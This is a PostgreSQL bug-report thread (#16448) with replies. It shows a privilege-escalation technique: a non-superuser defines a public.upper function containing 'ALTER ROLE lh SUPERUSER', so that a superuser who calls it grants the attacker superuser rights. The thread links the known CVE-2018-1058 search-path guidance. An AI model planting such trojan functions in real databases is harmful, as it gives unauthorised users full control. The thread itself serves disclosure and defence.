Обсуждение: BUG #16448: Remote code execution vulnerability

Поиск
Список
Период
Сортировка

BUG #16448: Remote code execution vulnerability

От
PG Bug reporting form
Дата:
The following bug has been logged on the website:

Bug reference:      16448
Logged by:          yi Ding
Email address:      abcxiaod@126.com
PostgreSQL version: 10.12
Operating system:   linux
Description:

A common user created a function in the public space and added some
malicious codes in the function, when other users with superuser rights call
this function, the malicious code will be executed , so as to achieve the
purpose of remote malicious code execution.

   First, Non-superuser lh defines a function named upper, which contains
the statement to modify user permissions.
SQL:
CREATE TABLE public.testlh AS SELECT ‘lh’::varchar AS contents;
CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
ALTER ROLE lh SUPERUSER;
SELECT pg_catalog.upper($1);
$$ LANGUAGE SQL VOLATILE;
 
Second, Superuser pg01 will execute the above statement after calling the
upper function, whice will change user lh to a super user.


Re: BUG #16448: Remote code execution vulnerability

От
Heikki Linnakangas
Дата:
On 18/05/2020 12:14, PG Bug reporting form wrote:
> The following bug has been logged on the website:
> 
> Bug reference:      16448
> Logged by:          yi Ding
> Email address:      abcxiaod@126.com
> PostgreSQL version: 10.12
> Operating system:   linux
> Description:
> 
> A common user created a function in the public space and added some
> malicious codes in the function, when other users with superuser rights call
> this function, the malicious code will be executed , so as to achieve the
> purpose of remote malicious code execution.
> 
>     First, Non-superuser lh defines a function named upper, which contains
> the statement to modify user permissions.
> SQL:
> CREATE TABLE public.testlh AS SELECT ‘lh’::varchar AS contents;
> CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
> ALTER ROLE lh SUPERUSER;
> SELECT pg_catalog.upper($1);
> $$ LANGUAGE SQL VOLATILE;
>   
> Second, Superuser pg01 will execute the above statement after calling the
> upper function, whice will change user lh to a super user.

See 
https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058%3A_Protect_Your_Search_Path

- Heikki



Re: BUG #16448: Remote code execution vulnerability

От
"David G. Johnston"
Дата:
On Mon, May 18, 2020 at 2:41 AM PG Bug reporting form <noreply@postgresql.org> wrote:
The following bug has been logged on the website:

Bug reference:      16448
Logged by:          yi Ding
Email address:      abcxiaod@126.com
PostgreSQL version: 10.12
Operating system:   linux
Description:       

A common user created a function in the public space and added some
malicious codes in the function, when other users with superuser rights call
this function, the malicious code will be executed , so as to achieve the
purpose of remote malicious code execution.

The project respectfully requests that security related concerns be reported to the security list as opposed to the public bug report listing.



David J.